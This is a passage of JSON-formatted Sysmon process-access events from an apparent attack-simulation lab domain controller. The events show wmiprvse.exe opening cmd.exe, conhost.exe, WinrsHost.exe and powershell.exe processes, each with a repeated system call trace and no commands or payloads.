Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00108EF70700}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001085460800}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 